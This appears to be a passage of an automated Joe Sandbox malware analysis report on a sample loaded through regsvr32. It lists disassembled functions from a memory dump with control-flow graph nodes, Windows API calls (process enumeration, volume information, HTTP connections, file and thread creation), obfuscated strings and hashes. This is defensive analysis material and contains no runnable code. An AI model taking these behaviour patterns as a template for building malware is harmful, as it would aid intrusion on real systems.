                                                                                                                                                                                    control_flow_graph 563 2ce3438-2ce3486 564 2ce3488-2ce348d 563->564 565 2ce36e6-2ce378e call 2cd4dfc 564->565 566 2ce3493-2ce3498 564->566 574 2ce379a-2ce379e 565->574 575 2ce3790-2ce3795 565->575 568 2ce34ac-2ce3534 call 2cda8e0 566->568 569 2ce349a-2ce349f 566->569 576 2ce3539-2ce353e 568->576 570 2ce34a5-2ce34aa 569->570 571 2ce37a3-2ce37a8 569->571 570->564 571->564 577 2ce37ae-2ce37b1 571->577 574->571 578 2ce36d8-2ce36e1 575->578 579 2ce37b7-2ce386e call 2cda798 576->579 580 2ce3544-2ce3549 576->580 577->579 581 2ce3870-2ce387a 577->581 578->564 584 2ce387d-2ce3890 579->584 580->577 582 2ce354f-2ce3554 580->582 581->584 582->578 585 2ce355a-2ce35e6 call 2cd4dfc 582->585 585->577 589 2ce35ec-2ce36d2 call 2cf4a5c call 2cda798 585->589 589->577 589->578
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 6>$c^a$lJ,
                                                                                                                                                                                    • API String ID: 0-2820885608
                                                                                                                                                                                    • Opcode ID: 806fbeec97bab1d6521af437b1939402f8f7e3549c268b4ce014efa68613405d
                                                                                                                                                                                    • Instruction ID: 326b4d29a44b7bd1e887dd209331e2857e71ba4a0afe69e9469406ac0f1f562f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 806fbeec97bab1d6521af437b1939402f8f7e3549c268b4ce014efa68613405d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4ED117B190478C8BCF58CFA8C88A4ED7FF1FB88358F244219E846A7250D774E985CB95
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 02CEC860 Relevance: 4.0, Strings: 3, Instructions: 206COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 644 2cec860-2cec8b1 call 2cf144c 647 2cec8b6-2cec8bb 644->647 648 2cecb79-2cecb89 call 2cd1de4 647->648 649 2cec8c1-2cec8c6 647->649 657 2cecb8b-2cecb90 648->657 658 2cecb95 648->658 651 2cec8cc-2cec8d1 649->651 652 2ceca64-2cecb5d call 2cdaa30 649->652 654 2cec8d7-2cec8d9 651->654 655 2cec991-2ceca5a call 2cf12fc 651->655 662 2cecb62-2cecb69 652->662 659 2cec8df-2cec8e4 654->659 660 2cecba7-2cecc27 call 2cdff40 654->660 667 2ceca5f Process32FirstW 655->667 657->647 665 2cecb97-2cecb9c 658->665 663 2cec8ea-2cec8ef 659->663 664 2cec982-2cec98c 659->664 669 2cecc2c-2cecc44 660->669 668 2cecb6f-2cecb74 662->668 662->669 663->665 670 2cec8f5-2cec97d call 2cdd604 663->670 664->647 665->669 671 2cecba2 665->671 667->652 668->647 670->647 671->647
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: =\$~W$'
                                                                                                                                                                                    • API String ID: 0-3124701200
                                                                                                                                                                                    • Opcode ID: 1c99fa3b55c2ac82a84a91b5d19b0469eb31213bec8731a85eed8c120310bcf7
                                                                                                                                                                                    • Instruction ID: 4a28a0306111a8353bad5a949df8a3fc8548b55f0dfa6e8ad4f82b391e76005d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c99fa3b55c2ac82a84a91b5d19b0469eb31213bec8731a85eed8c120310bcf7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25A14E715197849FCBA9DF24C48959EBBF1FB84344F801A1EF8868B260D7B4DA44CF42
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 02CDF994 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32 ref: 02CDFAE4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InformationVolume
                                                                                                                                                                                    • String ID: $*=$b.
                                                                                                                                                                                    • API String ID: 2039140958-4176112928
                                                                                                                                                                                    • Opcode ID: 346976810df18c024b58b8b1e6b853f8ab62219822a63ae29cb5cc5a3c5dff76
                                                                                                                                                                                    • Instruction ID: 37936e4f0e81e9c1addbd6c3fd6c41ed7a3925d8ae128843df28c81d0f62051f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 346976810df18c024b58b8b1e6b853f8ab62219822a63ae29cb5cc5a3c5dff76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F41397060C7848FD7A8DF18D0897ABBBE0FB98315F104A1EE88987355CB749888CB47
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 02CDE0D4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 674 2cde0d4-2cde23c call 2cf144c call 2cd89d8 InternetConnectW
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ConnectInternet
                                                                                                                                                                                    • String ID: o
                                                                                                                                                                                    • API String ID: 3050416762-252678980
                                                                                                                                                                                    • Opcode ID: 112bcd67e9ebc57c78e66efcc13563654b4e3f0dda1229024f632da053e7203d
                                                                                                                                                                                    • Instruction ID: 471f7452546facfac55e1287953a0e33ee10436ca17b719e8d2c9ce7380ba8a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 112bcd67e9ebc57c78e66efcc13563654b4e3f0dda1229024f632da053e7203d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4541027060C7848FD7A8DF19D48579BBBE0FB89305F404A2EE8CD87256DB349885CB86
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 02CED79C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID: v/p
                                                                                                                                                                                    • API String ID: 823142352-3978593441
                                                                                                                                                                                    • Opcode ID: 68c780395f955e950d2ebcb50deffce3f0b9355b3905db6f66bde5ff0f0c67f6
                                                                                                                                                                                    • Instruction ID: 900500de23c23d9ea7ee33257ea150440c3f5b35153f36086a82e24a8482165f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68c780395f955e950d2ebcb50deffce3f0b9355b3905db6f66bde5ff0f0c67f6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B31057050C7848FC7A4DF18D08479ABBE5FB98314F104A6EE88DD7262DB749885CB87
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 02CD91EC Relevance: 1.6, APIs: 1, Instructions: 91networkCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HttpOpenRequest
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1984915467-0
                                                                                                                                                                                    • Opcode ID: 54ac01d4c75d6e061093fcf435e0fad92b7802823d1446ad947ac7530fcd3a7e
                                                                                                                                                                                    • Instruction ID: 02de82d458aa6a92c50d98d680d13332d5f14e1cf7c033580b85a950564ef09e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54ac01d4c75d6e061093fcf435e0fad92b7802823d1446ad947ac7530fcd3a7e
                                                                                                                                                                                    • Instruction Fuzzy Hash: B0411A7051D7808BE7B8DF18D489B9AB7E0FB98305F104A5EE88D8B255CB749844CB86
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 02CDD864 Relevance: 1.6, APIs: 1, Instructions: 84threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                    • Opcode ID: 919e413507f5d37ff538dab85320da54a1bc9eedddd4ec7782e108e30ff8ee19
                                                                                                                                                                                    • Instruction ID: a4cbb3de8761c763351e934ffe2780fe80c91c9d843c1a57d3265e1437f29411
                                                                                                                                                                                    • Opcode Fuzzy Hash: 919e413507f5d37ff538dab85320da54a1bc9eedddd4ec7782e108e30ff8ee19
                                                                                                                                                                                    • Instruction Fuzzy Hash: C831097160CB848FDBB8DF18D08575AB7E1FB99314F20495EE88D8725ACB749848CB87
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%